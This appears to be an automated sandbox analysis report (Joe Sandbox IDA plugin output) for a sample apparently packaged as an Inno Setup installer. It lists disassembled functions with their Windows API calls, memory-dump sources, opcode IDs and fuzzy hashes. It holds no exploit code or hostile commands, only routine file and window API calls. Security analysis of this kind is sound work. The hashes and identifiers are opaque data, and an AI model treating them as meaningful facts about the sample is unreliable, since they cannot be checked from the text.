                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9910034608204EFD715CF54E991F5ABBF9EB89305F2180BAED0897792D638AE04DF58
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00455DF8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F37), ref: 00455E28
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E2E
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1646373207-3712701948
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9e389cdcc520b220afcb5f5f8f6a368ff5fa888139b3862bd01b620cb4330125
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 12dfdd1b414f9b5fa57bb507e68127e36b1c1a940f154b23c6ee37fdedd7ee09
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e389cdcc520b220afcb5f5f8f6a368ff5fa888139b3862bd01b620cb4330125
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66415171A04649AFCF01EFA5C8929EFB7B8EF49304F508566F800F7252D6785E09CB69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004751F8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 00475251
                                                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 0047532E
                                                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 0047533C
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                                                                                                                  • String ID: unins$unins???.*
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3541575487-1009660736
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3b38f1f5b14f2e763650f48e58e75a2c6f304b7f035d7bf7fac251bc3c531ee2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9ba6e551af2be01ae54f2bf6d4feb37662207b66b60327addd096aea054bc42d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b38f1f5b14f2e763650f48e58e75a2c6f304b7f035d7bf7fac251bc3c531ee2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 333153706005489FDB10EB65D981ADE77B9EF44344F5080F6A80CAB3B2DBB89F418B58
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00417CE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • IsIconic.USER32(?), ref: 00417D1F
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window$Placement$Iconic
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ,
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 568898626-3772416878
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 419626ddcb93f619c016e5eb608395eb97e33a9638738bd346f5ce49c9230b00
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 117db6d3727d0f94901dea8748b8d47281c3d2add8a8e77c7f929e434730b1f7
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 419626ddcb93f619c016e5eb608395eb97e33a9638738bd346f5ce49c9230b00
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41213171604208ABCF40EF69E8C0EEA77B8AF49314F05456AFD18DF246C678DD84CB68
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00464048 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000000,00464205), ref: 00464079
                                                                                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 00464108
                                                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,004641BA,?,00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 0046419A
                                                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,004641C1,004641BA,?,00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 004641B4
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4011626565-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b608042c801e8bcd93828008ac8f10ed68dabbc04d812f1701ad2cd02e87d700
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2652c2d8e8669354d55d474f1d59e7b06630ff05c6329d0403030a32038cf055
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b608042c801e8bcd93828008ac8f10ed68dabbc04d812f1701ad2cd02e87d700
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E418770A00618AFCF10EF65DC55ADEB7B8EB89705F5044BAF804E7381E67C9E848E59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004644C4 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000000,004646AB), ref: 00464539
                                                                                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 0046457F
                                                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,00464658,?,00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 00464634
                                                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,0046465F,00464658,?,00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 00464652
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4011626565-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a7c3a2807c1d07e9384e46bbff3edb0dc1c5102c97f3ad169cf1688449ca88a6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7635123f594c8b6db569002a9bb01bf8fa96c74c2cf80da52efac59b167f1e7c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a7c3a2807c1d07e9384e46bbff3edb0dc1c5102c97f3ad169cf1688449ca88a6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8416171A00A18EBCB10EFA5CC959DEB7B9EB88305F4044AAF804A7351E77C9E448E59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004833BC Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • IsIconic.USER32(?), ref: 004833FA
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 00483418
                                                                                                                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A4,004828DE,00482912,00000000,00482932,?,?,?,0049C0A4), ref: 0048343A
                                                                                                                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A4,004828DE,00482912,00000000,00482932,?,?,?,0049C0A4), ref: 0048344E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window$Show$IconicLong
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2754861897-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 26f2524beb83a1697fb2f3c3d4c3f5548a09f48141019de32dcd2365822c4b68
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9902e76ed030cf172564c6423cfc444f456bf65fce7539c2ce1f68efba32f602
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26f2524beb83a1697fb2f3c3d4c3f5548a09f48141019de32dcd2365822c4b68
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D017134A452019EEB11BBA5DD8AB5B27C45F10B09F08083BB9029F2A3CB6D9D41D71C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00462ABC Relevance: 4.6, APIs: 3, Instructions: 67fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,00462B90), ref: 00462B14
                                                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,00462B70,?,00000000,?,00000000,00462B90), ref: 00462B50
                                                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,00462B77,00462B70,?,00000000,?,00000000,00462B90), ref: 00462B6A
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3541575487-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 24c68e44cd600449d84999e90dba83f839d8db9d851fe02b8e21427015a7b51e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0f193a6fcf1d943c675bf75123405c31ceeb2ecab595186adb6c93933d2a98b0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24c68e44cd600449d84999e90dba83f839d8db9d851fe02b8e21427015a7b51e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7121D871904B087EDB11DF65CC51ADEBBACDB49704F5084F7E808E31A1E6BCAE44CA5A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004241EC Relevance: 4.5, APIs: 3, Instructions: 32windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • IsIconic.USER32(?), ref: 004241F4
                                                                                                                                                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?,?,?,0046CFFB), ref: 00424201
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021225AC,0042421A,?,?,?,0046CFFB), ref: 00423B5F
                                                                                                                                                                                                                                                                                                                                                                  • SetFocus.USER32(00000000,?,?,?,0046CFFB), ref: 0042422E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window$ActiveFocusIconicShow
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 649377781-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 85e094fd83fda52d6ba69bb43f194f943737e29f022f28d5c3d7585fd8a6de7d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ECF03A717001208BDB10EFAAA8C4B9662A8EF48344B5500BBBC09DF34BCA7CDC0187A8
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00417CDE Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • IsIconic.USER32(?), ref: 00417D1F
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window$Placement$Iconic
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 568898626-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e9f294a83204c688928c4c422749f875b3ddc518ff0edd6358ab4a317cb2701d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b3485382f52430a3de90e88073d2477855dbbaeb9eeee9907b508ce44eeb6dab
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e9f294a83204c688928c4c422749f875b3ddc518ff0edd6358ab4a317cb2701d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02017C31204108ABDB10EE69E8C1EEA73A8AF45324F054567FD08CF242D639ECC087A8
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00452A4C Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AAF,?,?,-00000001,00000000), ref: 00452A89
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000,00452AAF,?,?,-00000001,00000000), ref: 00452A91
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileFindFirstLast
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 873889042-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1941d0d4221d31b2177a9e0bf96856282cc1e1b6b4252b38d63793718c861322
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2517da8cadb6fb7e7a3bde91136fc32a544ec95f0d2c756002249f4fd287b9db
